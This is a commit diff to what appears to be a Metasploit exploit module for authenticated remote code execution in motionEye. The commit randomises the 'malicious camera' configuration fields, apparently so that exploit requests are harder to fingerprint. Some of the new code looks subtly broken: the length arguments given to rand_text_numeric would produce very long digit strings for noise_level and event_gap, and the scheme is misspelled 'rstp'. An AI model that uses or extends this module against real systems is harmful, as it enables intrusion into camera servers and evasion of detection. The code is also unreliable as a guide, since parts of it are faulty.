add some random

vognik · vognik · commit 1be31c05daeb · 2025-10-07T08:38:20.000+04:00
diff --git a/modules/exploits/multi/http/motioneye_auth_rce_cve_2025_60787.rb b/modules/exploits/multi/http/motioneye_auth_rce_cve_2025_60787.rb
@@ -180,6 +180,10 @@ def send_signed_request_cgi(opts = {})
     return send_request_cgi(new_opts)
   end
 
+  def random_ipv4
+    Array.new(4) { rand(0..255) }.join('.')
+  end
+
   def add_camera
     print_status('Adding malicious camera...')
 
@@ -188,8 +192,8 @@ def add_camera
       'method' => 'POST',
       'ctype' => 'application/json',
       'data' => {
-        'scheme' => '',
-        'host' => '',
+        'scheme' => 'rstp',
+        'host' => random_ipv4,
         'port' => '',
         'path' => '/',
         'username' => '',
@@ -229,7 +233,7 @@ def set_exploit(camera_id)
           'name' => camera_name,
           'proto' => 'netcam',
           'auto_brightness' => false,
-          'rotation' => '0',
+          'rotation' => [0, 90, 180, 270].sample,
           'framerate' => '2',
           'privacy_mask' => false,
           'storage_device' => 'custom-path',
@@ -242,10 +246,10 @@ def set_exploit(camera_id)
           'upload_enabled' => false,
           'upload_picture' => false,
           'upload_movie' => false,
-          'upload_service' => 'ftp',
+          'upload_service' => ['ftp', 'sftp', 'webdav'].sample,
           'upload_server' => '',
           'upload_port' => '',
-          'upload_method' => 'post',
+          'upload_method' => ['post', 'put'].sample,
           'upload_location' => '',
           'upload_subfolders' => false,
           'upload_username' => '',
@@ -258,7 +262,7 @@ def set_exploit(camera_id)
           'web_hook_storage_enabled' => false,
           'command_storage_enabled' => false,
           'text_overlay' => false,
-          'text_scale' => '1',
+          'text_scale' => Rex::Text.rand_text_numeric(1..3),
           'video_streaming' => false,
           'streaming_framerate' => '5',
           'streaming_quality' => '85',
@@ -282,17 +286,17 @@ def set_exploit(camera_id)
           'max_movie_length' => '0',
           'preserve_movies' => '0',
           'motion_detection' => false,
-          'frame_change_threshold' => '0.6507161458333334',
+          'frame_change_threshold' => "0.#{Rex::Text.rand_text_numeric(16)}",
           'max_frame_change_threshold' => '0',
           'auto_threshold_tuning' => false,
           'auto_noise_detect' => false,
-          'noise_level' => '13',
+          'noise_level' => Rex::Text.rand_text_numeric(10..32),
           'light_switch_detect' => '0',
           'despeckle_filter' => false,
-          'event_gap' => '30',
+          'event_gap' => Rex::Text.rand_text_numeric(5..30),
           'pre_capture' => '1',
           'post_capture' => '1',
-          'minimum_motion_frames' => '20',
+          'minimum_motion_frames' => Rex::Text.rand_text_numeric(20..30),
           'motion_mask' => false,
           'show_frame_changes' => false,
           'create_debug_media' => false,
@@ -303,7 +307,7 @@ def set_exploit(camera_id)
           'command_notifications_enabled' => false,
           'command_end_notifications_enabled' => false,
           'working_schedule' => false,
-          'resolution' => '640x480'
+          'resolution' => ['320x240', '640x480', '1280x720'].sample
         }
       }.to_json
     )
